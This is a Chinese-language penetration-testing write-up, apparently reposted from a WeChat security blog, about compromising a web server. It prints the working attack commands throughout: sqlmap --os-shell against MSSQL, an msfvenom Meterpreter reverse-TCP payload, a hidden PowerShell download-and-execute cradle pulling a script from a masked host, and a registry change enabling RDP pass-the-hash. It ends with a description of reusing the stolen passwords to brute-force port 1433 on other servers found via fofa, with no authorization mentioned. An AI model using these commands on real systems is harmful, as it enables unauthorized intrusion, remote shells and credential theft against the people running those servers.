这篇文章由群友@dddd原创投稿,虽然是些科普型常规手法,但还是感谢师傅的分享。
0x00 前言
0x01 弱口令
0x02 SQL注入
http://xxxxxx/xxxxx/GroupMember.aspx?gid=150198说干就干,直接SQLMAP。
发现为MSSQL,且DBA权限,直接--os-shell
0x03 上线MSF
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1Vps开启监听
直接powershell上线session
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题;我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。
下面推荐一个不错的网站:
https://r0yanx.com/tools/java_exec_encode/
0x04 提权
迁移一下进程,防止进程掉线。
0x05 远程登录服务器
0x06 通过hash远程登录管理员账号
与测试目标并非同一台,这只是提供一个思路!
如果使用hash远程登录RDP,需要开启"Restricted Admin Mode"
//开启Restricted Admin modeREG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f//查看是否已开启0x0则表示开启REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
成功远程管理员桌面
0x07 其他
通过fofa找了一下,资产还是挺多的,且很多都开放1433端口,猜测会存在同一个人部署的网站。
尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,且都是sa权限,结束!!!
关 注 有 礼
推 荐 阅 读
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247503324&idx=1&sn=4da754eed87477c3b28377c6fc428fb3&chksm=cfa569cff8d2e0d90a25e7a4bd2da27878779749ae52d360a6a58d8626ab7b14c856c75b8674#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh